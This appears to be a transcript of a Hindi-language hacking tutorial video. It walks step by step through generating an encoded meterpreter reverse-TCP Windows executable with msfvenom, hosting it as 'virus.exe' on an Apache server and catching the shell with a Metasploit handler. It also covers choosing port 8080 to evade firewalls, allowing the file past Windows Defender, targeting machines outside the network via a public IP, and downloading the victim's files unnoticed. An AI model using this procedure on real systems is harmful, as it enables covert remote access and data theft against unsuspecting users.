हेलो गाइस, तो कैसे आप सभी लोग। आई होप कि अब हम शुरू करने जा रहे हैं कि कोडिंग का पार्ट सॉरी जो कि है इथिकल हैकिंग का पार्ट। ठीक है, तो जैसे कि मैं यार हर बार कोड लिखता हूँ तो मुझे कोडिंग का शौक है। ठीक है, तो अब हम क्या करेंगे, हमें पहले कमांड लगानी है। ठीक है, तो हमें पहले पेलोड को जनरेट करना है, उसके बाद हम उस पेलोड को अपने विंडोज़ के सिस्टम में डालेंगे और उसके बाद हम लोग उस विंडोज सिस्टम को हैक करेंगे। ओके, तो ये चीज़ याद रखना कि वो फिजिकली आपके पास होना चाहिए, जो इस विंडोज़ को आप हैक कर रहे हो एटलीस्ट 2-3 मिनट के लिए होना चाहिए, क्योंकि जो विंडोज़ डिफेंडर है वो ऑटो डिटेक्ट कर लेगा कि आपके वो सिस्टम में जो वायरस है उसको आपको अलाउ इन डिवाइस करना है। जैसे कि मैं आपको बताऊंगा कि कैसे आपको उसको अलाउ करना है, उसके लिए आपको ज़्यादा टेंशन लेने की ज़रूरत नहीं पड़ेगी। ओके, तो अब हमें क्या करेंगे, हमें सबसे पहले एक वायरस को क्रिएट करना है। तो अब हम वायरस को क्रिएट कर लेते हैं। ठीक है, तो MSF वेनम। ठीक है, अब उसके बाद वायरस को क्रिएट करने के लिए मैं आपको सिंपली कमांड लगाना चाहूँगा हेल्प की, जिसके अंदर आपको सारे ऑप्शंस मिल जाएंगे। अब देखो हमें कुछ ऑप्शंस को ट्राई करना है, जस्ट लाइक लिस्ट को ट्राई करना है कि हमें ये देखना है कि कौन सा इनकोडर बेस्ट है। तो लिस्ट इनकोडर्स के लिए ये देख सकते हो कि हमारे पास ये कमांड लगानी पड़ेगी, जिससे कि हम इनकोडर्स की लिस्ट ले सकते हैं। ठीक है, फॉर्मेट जो कि हमारा 64 बिट होगा, तो इसके बारे में मैं आपको बताऊंगा, इसके लिए आपको लिस्ट लेने की जरूरत नहीं पड़ेगी। ठीक है, पेलोड ऑब्वियसली हम कौन से पेलोड का इस्तेमाल करने हैं, अगर आपको वो देखना है तो आप लिस्ट पेलोड देख सकते हो। लिस्ट पेलोड की कमांड है, उसको देख सकते हो। राइट, तो हमें कुछ बेसिक कमांड्स के ऊपर फोकस करना पड़ेगा। आर्किटेक्चर, हम किसी भी एक 32 बिट पेलोड को 64 बिट में कन्वर्ट करने के लिए हमें आर्किटेक्चर की ज़रूरत पड़ती है। ठीक है, और इसके बाद इटरेशंस। ओके, इटरेशंस बेसिकली वो लेयर्स होते हैं जो आपको और विंडोज़ डिफेंडर से बचाते हैं, लेकिन फिलहाल के लिए इतने कुछ पावरफुल नहीं है। ठीक है, तो कोई बात नहीं, हमारे पास एक अच्छा खासा एक कोर्स आने वाला है। ओके, जिसके अंदर मैं आपको पूरी तरीके से बताऊंगा कि यूनिक एक्सेस का पूरा सेक्शन, तो उसके लिए आपको ज़्यादा टेंशन लेने की ज़रूरत नहीं पड़ने वाली। ओके, तो ये सब तो बस एजुकेशन पर्पज़ के लिए, इसे ध्यान में रखना। तो अब हम क्या करेंगे, अब हमें सिंपली कमांड लगानी होगी MSF वेनम। तो सबसे पहले हम देखेंगे कि इनकोडर्स हमारे पास कौन से और उसमें से एक इनकोडर हम चूज़ करेंगे। ठीक है, MSF वेनम हाइफन लिस्ट, और यहाँ पे आपको लिखना है इनकोडर्स। ओके, तो इनकोडर्स ये बेसिकली कमांड इसलिए है कि आप व्हाट इनकोडर्स का इस्तेमाल करना सीख जाएंगे और इनकोडर्स क्या है ये आपको अच्छी तरीके से पता चल जाएगा। ठीक है, तो अब हमें क्या करेंगे, इसको वर्टिकली मैं एक और एक और टर्मिनल ओपन कर रहा हूँ, जिसकी वजह से हम जो है अभी के टाइम पे MSF मेनू को एक्टिवेट करके रखेंगे। ठीक है, सॉरी MSF कंसोल को एक्टिवेट करके रखेंगे। ओके, तो मैं MSF कंसोल को भी यहाँ पे एक्टिवेट कर लेता हूँ। ऑलराइट, तो ठीक है, अब जैसे कि ये लिस्ट भी हो रही है, ये MSF वेनम भी अच्छी तरीके से लोड हो रहा है, तब तक के लिए हमें वेट करना पड़ेगा। ओके, ठीक है, जो देख सकते हो आप लोग कि आपका जो कंसोल है वो भी चालू हो चुका है, उसी के साथ साथ आपके पास लिस्ट भी आ चुकी है। ठीक है, तो अब लिस्ट के अंदर जो है मैं आपको एक चीज़ क्लियर करना चाहता हूँ कि जो लिस्ट है ये आप देख सकते हो यहाँ पे। तो ये जो बेसिकली लिस्ट है ना, उसके अंदर हमें एक्सलेंट जो इनकोडर्स हैं उनकी डिटेल जाननी है। ठीक है, तो रैंक आप देख सकते हो कि यहाँ पे एक्सलेंट के लिए ये एक है जो कि पावर शेल बेस 64। इसके इसका आप इस्तेमाल कर सकते हैं एग्जैक्टली। तो अब हम क्या करेंगे, यहाँ पे इसका इस्तेमाल करके देख लेते हैं, क्योंकि मैंने दूसरा एक इस्तेमाल किया था। ठीक है, चाहो तो आप किसी का भी इस्तेमाल कर सकते हो, लेकिन जो इनकोडर है वो काफ़ी तेज़ है। ओके, तो देख सकते हो यहाँ पे एक था। ओके, तो ये था शिकाटा गाई नाई। ओके, तो ये एक है जिसका आप इस्तेमाल कर सकते हैं। ओके, तो अब हमें सिंपली उसका इस्तेमाल करना है जो कि हमने चूज़ किया था। अब हमें पहले ये देखना है कि हमें आर्किटेक्चर कौन सा लेना है। हमें आर्किटेक्चर लेना है 64 बिट का। राइट, तो हम कमांड लगाएंगे MSF वेनम। ओके, MSF वेनम -A फॉर आर्किटेक्चर X64, क्योंकि हमारा जो आर्किटेक्चर है वो 64 बिट है, जिसपे हम अटैक करने वाले वो 64 बिट है। ओके, अगर वो 32 बिट है तो आपको X86 लिखना पड़ेगा। ठीक है, और उसके बाद हमें लिखना है विंडोज़ स्लैश। अब यहाँ पे एक और चीज़ मेंशन कर रहा हूँ कि आपको इस X64 फिर से लिखना पड़ेगा ताकि आप 64 बिट को एक्सेस कर सके। ओके, इसके बाद आपको मीटर क्योंकि आपके पेलोड का नाम, ठीक है, हम रिवर्स TCP का इस्तेमाल करने वाले, तो मीटर स्लैश रिवर्स _TCP। ठीक है, अब ये हो गया। इसके बाद मैंने आपसे कुछ कहा था कि हमें कुछ चीज़ें इस्तेमाल करनी है कि इनकोडर यूज़ करना है और फॉर्मेट को यूज़ करना है। राइट, इनकोडर फॉर्मेट एंड हमें यूज़ करना है इटरेशंस। ओके, सो पहले काम कर लेते हैं, पहले फॉर्मेट एंड इनकोडर का इस्तेमाल कर लेते हैं। ठीक है, तो -F EXE फॉर्मेट EXE है, और इसके बाद हमें यूज़ करना है इनकोडर का, तो -E और इनकोडर का जो नेम है उसको पेस्ट करना है। ठीक है, तो ये रहा हमारा। ओह, गलती से ये पेस्ट हो गया यार, मैं असल में इसका इस्तेमाल नहीं करना चाहता था ऑब्वियसली, तो चलिए इसको थोड़ा सा डिलीट कर देते। ओह यार -E, और उसके बाद
इसका नेम। ओके तो एक्सेलेंट कहाँ पे है, एक्सेलेंट एक्सेलेंट एक्सेलेंट, आई नीड एक्सेलेंट, या दिस इज इट। तो आपको ये सब पूरा कॉपी करना है, ठीक है। कॉपी करने के बाद यहाँ पर आपको पेस्ट कर देना, ऑलराइट। तो पेस्ट कर देते हैं यहाँ पे, पेस्ट सिलेक्शन। ओके तो ये हो चुका है। अब हमें इटरेशन देना है। इटरेशन बेसिकली एक लेयर की तरह काम कर रहा है, तो 3। ओके अब ये सारी चीज़ें होने के बाद आपको एल होस्ट आपकी आईपी एड्रेस देनी है। अगर आपको आईपी एड्रेस पता नहीं है तो आपको एक नेक्स्ट शेल ओपन करना है, ठीक है। अब देखो ये पोस्ट कनेक्शन की भी काम करता है, मतलब कि अगर आपको ऐसे मशीन को टारगेट करना है जो कि आपके नेटवर्क से बाहर है, तो आपको आईपी एड्रेस देनी है पब्लिक आईपी एड्रेस। अब पब्लिक आईपी एड्रेस कहाँ पे मिलेगी, वो आप गूगल पे जाओगे ना, व्हाट इज़ माई आईपी सर्च करोगे तो आपको वहाँ पे पब्लिक आईपी मिल जाएगी, ऑलराइट। तो अब हम क्या करेंगे, IF कॉन्फिग लिखेंगे। ओके IF कॉन्फिग, तो आपको अपने आईपी एड्रेस मिल जाएगी 192.168.83.128। ओके तो ये मिल गई। अब हम क्या करेंगे, एल होस्ट इज इक्वल्स टू 192.168.83.128। ओके तो ये हमारे आईपी एड्रेस है। अब हमें पोर्ट देना है, ठीक है। तो एल पोर्ट, मैं आपको रिकमेंड करूँगा कि जो पोर्ट है वो आप सिलेक्ट करो 8080, क्योंकि ये जो पोर्ट होता है ना ये बेसिकली डेवलपर्स के लिए यूज़ होता है, और फायरवॉल भी इसे एक्सेस करने के लिए परमिशन दे देगा, फायरवॉल आपको डिटेक्ट नहीं कर पाएगा, ठीक है। तो 8080 सही है, ऑलराइट। तो ये सब कुछ अब हो चुका है, आई होप कि सब कुछ हो चुका है, या तो अब हम क्या करेंगे, हमसे एक गलती होगी कि यहाँ पे आपको -p भी लिखना है, क्योंकि हम पेलोड का इस्तेमाल करने वाले। तो उस पेलोड का नेम लिखने से पहले हमें लिखना पड़ेगा -p, जिसको हम कहेंगे पेलोड। ओके और पेलोड का नेम, फॉर्मेट, इनकोडर के बाद इटरेशंस, और फिर हमारा एल होस्ट, एल पोर्ट। ओके ये सारी चीज़ें होने के बाद हमें ग्रेटर का साइन देना, और इसके बाद आपको आपको यहाँ पे आपका पाथ देना है। ओके तो यहाँ पे हम root/desktop। ओके तो मैं पहले डेस्कटॉप के ऊपर इसे देखना चाहूँगा कि कैसे ये वर्क हो रहा है, /virus.exe। ओके और एंटर कर देना है, ठीक है। अब ये जो सारी चीज़ें हैं वो कंप्लीट होने के बाद आपको दिखेंगी कि ये आपका जो वायरस है वो क्रिएट हो चुका है अपने डेस्कटॉप के ऊपर, ठीक है। तो हम इसके थोड़ा सा MSF कंसोल के ऊपर फोकस करेंगे। ओके अब यहाँ पे हम लोग क्या करेंगे, हम कमांड लगाएंगे यूज़ multi/handler। ओके तो multi/handler दिखने के बाद आप देख सकते हो कि हम जो है multi/handler का इस्तेमाल कर रहे हैं एक्सप्लॉइट को। ओके अब यहाँ पे आप देख सकते हो कि यहाँ पे आपकी जो वायरस है वो क्रिएट हो चुका है, ठीक है। तो अब हमें क्या करना है, अब हम देख लेते हैं कि वायरस क्रिएट हो चुका है नहीं। आप देख सकते हो कि वायरस जो है क्रिएट हो चुका है। अब इस पर्टिकुलर वायरस को आपको डालना है अपने लोकल होस्ट के अंदर, मतलब कि जो आपका जो सर्वर है उसके अंदर, जिससे कि हम इसे अपने विक्टिम के डिवाइस में डाउनलोड कर सकेंगे। ओके तो यहाँ पे हम डालेंगे var/www.html, और HTML के अंदर मैं एक फोल्डर बना के रखा है फाइल का, तो यहाँ पे मैं पेस्ट कर दूंगा। ओके और फाइल को पेस्ट करने के बाद मैं ऐसे कट कर दूंगा क्योंकि इसकी ज़रूरत नहीं है अभी हम ज़रूरत करने वाले इसकी मेटास्प्लॉइडेबल की। और यहाँ पे हमें एक सर्वर को मतलब कि सर्विस अपाचे 2 को स्टार्ट करना है, जिससे कि हम उस पर्टिकुलर डिवाइस के अंदर जो है अपनी फाइल को डाउनलोड कर सके, ठीक है। सर्विस अपाचे 2 स्टार्ट। ओके अब हमने सर्वर तो हमारा स्टार्ट कर दिया, अब कोई दिक्कत नहीं आएगी। हमारा जो हमारे नेटवर्क से जितने भी डिवाइसेस कनेक्टेड है उन सब की डिटेल हम अभी ले सकते हैं। ओके अब हम यहाँ पे सेट पेलोड और पेलोड का नेम, अब हमने पेलोड का इस्तेमाल किया। पेलोड के लिए हमने क्या क्या इस्तेमाल किया था, तो हमारा जो पेलोड था वो रिवर्स TCP का था, तो हमें इस रिवर्स TCP को यहाँ पे कॉपी कर लेते हैं सबसे पहले, ताकि हम इजीली इससे ओके तो यहाँ पे कॉपी, ठीक है। और यहाँ पे हमें इसको पेस्ट करना है, ठीक है। तो पेस्ट सिलेक्शन कर देते हैं, इंटर। देख सकते हो कि हमारा जो पेलोड है बिल्कुल सेट हो चुका है। अब हमें क्या करना है, अब हमें शो ऑप्शंस करना है, ठीक है। तो शो ऑप्शंस करने के बाद आपको पता चल जाएगा कि हमें क्या क्या सेट करना पड़ेगा। हमें एल होस्ट एंड एल पोर्ट दोनों ही अगेन सेट करने पड़ेंगे। ओके तो अब हमें क्या करना है, सेट एल पोर्ट, ओके 8080, ओके और सेट एल होस्ट हमें सेट करना है 192.168.83.128। ओके और जैसे हम इसे सेट कर लेंगे तो आप देख सकते हो कि हमारा जो सक्सेसफुल जो है कंप्लीट हो चुका है। ठीक है तो हमने सब कुछ कंप्लीट कर लिया। तो अब हम फिर से शो ऑप्शंस के ऊपर आते हैं, और ये रहा। तो हमें सब कुछ सेट कर लिया। ओके कोई बात नहीं। अब हम विंडोज़ 10 मशीन जो है हमारी वो देख लेते हैं, ठीक है। यहाँ पे अपनी विंडोज़ 10 मशीन है, तो इसके अंदर हम जाएंगे गूगल क्रोम के अंदर, ठीक है। और गूगल क्रोम के अंदर यहाँ पे हम लोग क्या करेंगे, 192.168.83
-128/files के अंदर जाएंगे। ओके, ये जो virus.exe की फाइल है उसको हम इंस्टॉल करेंगे। ओके, और देख सकते हो कि मैंने विंडोज़ डिफेंडर जो है मैं आपको दिखाता हूँ। मैंने जो विंडोज़ डिफेंडर है वो उसको बंद करके रखा था, ठीक है, और ये डिटेक्ट भी नहीं करेगा बिकॉज कि हमने इनकोडर का इस्तेमाल किया था, तो ये डिटेक्ट नहीं करेगा, ठीक है। तो मैंने इसे बंद करके रखा है, आपको भी इसे बंद करके रखना चाहिए, लेकिन फिर भी जब ये बंद है फिर भी ये डिटेक्ट कर लेता है, ठीक है। अब मैं आपको बताऊंगा कि इससे कैसे इसको स्किप करना है, ठीक है। डोंट वरी, ठीक है। अब हम क्या करेंगे इसके अंदर, तो मैं इसको थोड़ा सा जो है शॉर्ट करने की कोशिश कर लेता हूँ, ठीक है गाइस। आप अभी फुल स्क्रीन में देख सकते हो। एक सेकेंड, मुझे स्क्रीन एडजस्ट करने में थोड़ी प्रॉब्लम हो रही है, लेकिन फिर भी ओके। तो अब हम क्या करेंगे, यहाँ पे आएंगे एक्सप्लॉइट, ओके, और एक्सप्लॉइट लिखने के बाद ये जो है अपना रिवर्स टीसीपी हैंडलर जो है शुरू कर देगा। अब हमें इसको बड़ा करना है, ठीक है, और इसके बाद मैं इसकी जो फाइल मैनेजर के अंदर चला जाता हूँ और इसको रन करने की कोशिश करता हूँ। जैसे मैं इसको रन करने की कोशिश करता हूँ, आप देख सकते हो ये मुझे वायरस के लिए नहीं पूछ रहा है, लेकिन अब मैं इसे रन कर रहा हूँ, ठीक है। और जैसे मैं इसे रन कर रहा हूँ तो मेरा वायरस जो है मुझे एक नोटिफिकेशन दे देगा कि भाई ये वायरस है। तो अगर आपको नोटिफिकेशन आ रहा है तो यहाँ पे आपको आना है, ठीक है, प्रोटेक्शन हिस्ट्री के अंदर आना है। यहाँ पे आपका पहले नंबर पे जो है वो आपका वायरस कहा जाएगा। एक्शंस के अंदर आपको करना है अलाउ फॉर दिस डिवाइस, ओके, तो ये बस आपको करना है, ठीक है। अब मैंने इसको बाईपास कर दिया तो ये नहीं आ रहा है, ठीक है। अब मैं आपको दिखाता हूँ, देख सकते हो कि जो हमारा जो वर्क है मीटर पीटर का वो ऑन हो चुका है, ठीक है। अब यहाँ पे मैंने आपको जैसे बताया कि विंडोज़ डिफेंडर से डिटेक्ट कर लेता है, तो आपको अलाउ ऑन दिस डिवाइस के ऊपर आपको क्लिक करना है, ठीक है। जैसे आप अलाउ करोगे 2 बार आपको पूछेगा कि ये वायरस है, फिर भी आपको उसको अलाउ ऑन द डिवाइस कर देना है, ठीक है। और उसी के बाद आपको ये मीटर पीटर का सेक्शन आ जाएगा। ऑलराइट, अगर आपको कोई दिक्कत आती है तो आप मुझे कमेंट में पूछ सकते हो और मैं आपको पूरी तरीके से हेल्प करने की कोशिश करूँगा। मैं आपको बताऊँगा कि आपको क्या करना है, लेकिन फिर भी अगर वो वायरस के लिए आ रहा है, विंडोज डिफेंडर आपको दिखा रहा है कि ये वायरस है, तो वो चीज़ आपको देखनी है और उसको अलाउ ऑन दी डिवाइस कर देना है, ठीक है। अब यहाँ पे मीटर पीटर का सेक्शन तो ऑन हो चुका है, लेकिन अब हम क्या करेंगे, इसे थोड़ा सा मैं इसको क्लियर करने की कोशिश करता हूँ, ठीक है। तो क्लियर कमांड नहीं काम करी है, कोई बात नहीं, मैं आपको दिखाता हूँ। अब यहाँ पे सबसे पहले कमांड लगाएंगे सिस इन्फो की। आप देख सकते हो कि सिस्टम की इन्फो क्या क्या है। 64 बिट आर्किटेक्चर है, विंडोज 10 है, ओके। हम इसके अंदर काफ़ी कुछ चेंजेस कर सकते हैं, लाइक कि हम PWD देख सकते हैं, हम कौन सी डायरेक्टरी के अंदर है। तो देख सकते हो कि मैं डाउनलोड्स फोल्डर के अंदर हूँ, ठीक है। और अगर मैं यहाँ पे देखो, मैं विंडोज़ 10 को यहाँ पे शिफ्ट कर रहा हूँ। यहाँ पे मैं न्यू टेक्स्ट डॉक्यूमेंट हाय, और इसके अंदर मैं लिखूँगा हाय संकेत, सेव करूँगा, ठीक है। अब ये डॉक्यूमेंट तो मैंने क्लियर कर दिया। अब यहाँ पे हम लोग क्या करेंगे, CD : बाहर आ गए। अब हम फिर से LS दबाएंगे तो आप देख सकते हैं कितनी सारी डायरेक्टरी है। अब हमें क्या करना है, CD डेस्कटॉप। अब हम CD डेस्कटॉप के अंदर है, LS दबाएंगे, आप देख सकते हो कि कुछ टेक्स्ट फाइल है। अब हमें क्या करना है, हमें डाउनलोड hi.txt, और आप देख सकते हो कि हमारी जो hi.txt फाइल है वो डाउनलोड हो चुकी है। अब आपको ये फाइल कहाँ पे मिलेगी, ऑब्वियसली आपको रूट सेक्शन के अंदर मिलेगी। तो ठीक है, यहाँ पे अभी देख सकते हो hi.txt, और इसे जब मैं ओपन करूँगा हाई संकेत, ओके, तो हमारी TXT फाइल भी हमने डाउनलोड कर ली उसकी, ओके। उसको पता भी नहीं है, लेकिन हमने उसके फाइल को एक्सेस कर लिया, ठीक है। आई होप कि ये सेक्शन आपको पसंद आया होगा। इसके अंदर मैंने थोड़ी सी क्रिटिकल थिंकिंग बताई हुई है, लेकिन अगर आपको ऐसे एडवांस लेक्चर्स चाहिए तो आपको कमेंट करना पड़ेगा, सर हमें और एडवांस लेक्चर्स चाहिए, आप प्लीज़ बना दो। मैं इसके लिए रेडी हूँ। मैं आपके लिए कुछ वीडियोस बनाऊंगा जिससे आपको बहुत ही क्लियर अंडरस्टैंडिंग होगा कि आपको क्या क्या ज़रूरी है। तो ठीक है, अब आपको बस कमेंट करना है और मैं एक सीरीज़ लाऊंगा जिसके अंदर मैं बहुत सारे डिवाइसेस को हैक करके बताऊंगा, ठीक है। तो मिलते हैं नेक्स्ट सेक्शन में, तब तक के लिए गुड बाय। एंड अगर आपको एरर आ रहा है तो यार प्लीज़ कमेंट करो, डिसलाइक मत करो, ठीक है। कमेंट कर दो बस, मैं आपको बताऊंगा, ठीक है।